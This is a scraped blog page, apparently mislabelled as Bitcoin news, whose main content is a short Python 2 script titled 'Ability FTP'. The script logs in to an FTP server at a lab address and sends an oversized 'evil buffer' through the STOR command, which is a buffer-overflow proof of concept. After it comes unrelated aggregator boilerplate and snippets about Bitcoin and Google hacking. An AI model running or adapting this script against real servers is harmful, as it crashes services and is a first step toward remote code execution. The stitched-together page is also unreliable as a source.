Ability FTP
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = '\x41' * 966 + '\x42' * 4 + '\x43' * 1030
print "\nSending evil buffer..."
s.connect(('192.168.103.128',21))
data = s.recv(1024)
s.send('USER ftp' +'\r\n')
data = s.recv(1024)
s.send('PASS ftp' +'\r\n')
data = s.recv(1024)
s.send('STOR ' +buffer+'\r\n')
s.close()
from BITCOIN NEWS https://ift.tt/2xkgzk8
via Bitcoin News Update
Monday, May 28, 2018
Ability FTP
Date - May 28, 2018
Bitcoin News
Share this
Related Articles :
Paling Dilihat
-
from BITCOIN NEWS http://bit.ly/2BAgGb6 via Bitcoin News Update
-
Google hacking master list Dan Morrill (Program Director CityU of Seattle) posted 11/14/2008 | Comments (2) This master list of Google Ha...
-
There’s only 10 days left until the Bitcoin Cash (BCH) network hard fork scheduled for Nov. 15. At the moment the upgrade has two competing...